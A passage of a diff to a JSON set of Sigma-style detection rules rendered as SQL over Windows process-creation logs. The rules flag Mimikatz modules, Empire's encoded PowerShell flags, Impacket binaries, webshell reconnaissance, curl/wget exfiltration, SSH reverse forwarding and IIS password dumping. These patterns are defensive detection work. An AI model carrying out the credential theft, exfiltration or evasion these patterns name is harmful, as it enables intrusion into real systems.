'\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nltest_recon.yml" + "filename": "proc_creation_win_scrcons_susp_child_process.yml" }, { - "title": "HackTool - Mimikatz Execution", - "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "title": "HackTool - Empire PowerShell Launch Parameters", + "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "status": "test", - "description": "Detection well-known mimikatz command line arguments", - "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "description": "Detects suspicious powershell command line parameters used in Empire", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Other tools that incidentally use the same command line parameters" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE 
'%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" + "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" }, { - "title": "Sticky Key Like Backdoor Execution", - "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", + "title": "HackTool - Impacket Tools Execution", + "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "status": "test", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the impacket tools" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND 
Channel = 'Security' AND ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\goldenPac%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\kintercept%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rpcdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\samrdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\secretsdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmiexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\getST\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" + "filename": "proc_creation_win_hktl_impacket_tools.yml" }, { - "title": "Potential Data Exfiltration Activity Via CommandLine Tools", - "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "title": "Webshell Detection With Command Line Keywords", + "id": "bed2a484-9348-4143-8a8a-b801c979301c", "status": "experimental", - "description": "Detects the use of various CLI utilities exfiltrating data via web requests", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + 
"attack.t1087" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName 
LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\quser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" + "filename": "proc_creation_win_webshell_detection.yml" }, { - "title": "MpiExec Lolbin", - "id": "729ce0ea-5d8f-4769-9762-e35de441586d", + "title": "PUA - AdFind Suspicious Execution", + "id": 
"9a132afa-654e-11eb-ae93-0242ac130002", "status": "test", - "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects AdFind execution with common flags seen used during attacks", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unknown" + "Legitimate admin activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE 
'\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_mpiexec.yml" + "filename": "proc_creation_win_pua_adfind_susp_usage.yml" }, { - "title": "Potential Privilege Escalation via Service Permissions Weakness", - "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", - "status": "test", - "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", - "author": "Teymur Kheirkhabarov", + "title": "Port Forwarding Attempt Via SSH", + "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "status": "experimental", + "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1574.011" + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1572", + "attack.t1021.001", + "attack.t1021.004" ], "falsepositives": [ - "Unknown" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" + "filename": "proc_creation_win_ssh_port_forward.yml" }, { - "title": "Devtoolslauncher.exe Executes Specified Binary", - "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", - "status": "test", - "description": "The Devtoolslauncher.exe executes other binary", - "author": 
"Beyu Denis, oscd.community (rule), @_felamos (idea)", + "title": "PUA - Fast Reverse Proxy (FRP) Execution", + "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "status": "experimental", + "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Legitimate use of devtoolslauncher.exe by legitimate user" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\frpc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" ], - "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" + "filename": "proc_creation_win_pua_frp.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service", - "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", + "title": "Microsoft IIS Service Account Password Dumped", + "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from 
other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", + "author": "Tim Rauch, Janantha Marasinghe", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Rare intended use of hidden services" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" + "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" }, { - "title": "PUA - 3Proxy Execution", - "id": "f38a82d2-fba3-4781-b549-525efbec8506", + "title": "UEFI Persistence Via Wpbbin - 
ProcessCreation", + "id": "4abc0ec4-db5a-412f-9632-26659cddf145", "status": "experimental", - "description": "Detects the use of 3proxy, a tiny free proxy server", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], "falsepositives": [ - "Administrative activity" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_3proxy_execution.yml" + "filename": "proc_creation_win_wpbbin_potential_persistence.yml" }, { - "title": "UAC Bypass Using Event Viewer RecentViews", - "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "title": "Proxy Execution via Wuauclt", + "id": "af77cf95-c469-471c-b6a0-946c685c4798", "status": "test", - "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation" + "attack.t1218", + "attack.execution" ], "falsepositives": [ "Unknown" ], 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" + "filename": "proc_creation_win_lolbin_wuauclt.yml" }, { - "title": "Winnti Malware HK University Campaign", - "id": "3121461b-5aa0-4a41-b910-66d25524edbb", - "status": "test", - "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", - "author": "Florian Roth (Nextron Systems), Markus Neis", + "title": "Renamed Office Binary Execution", + "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "status": "experimental", + "description": "Detects the execution of a renamed office binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE 
'\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Test.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" + "filename": "proc_creation_win_renamed_office_processes.yml" }, { - "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", - "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution via stordiag.exe", + "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "status": "test", + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "author": "Austin Songer (@austinsonger)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate use of AnyDesk from a non-standard folder" + "Legitimate usage of stordiag.exe." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" ], - 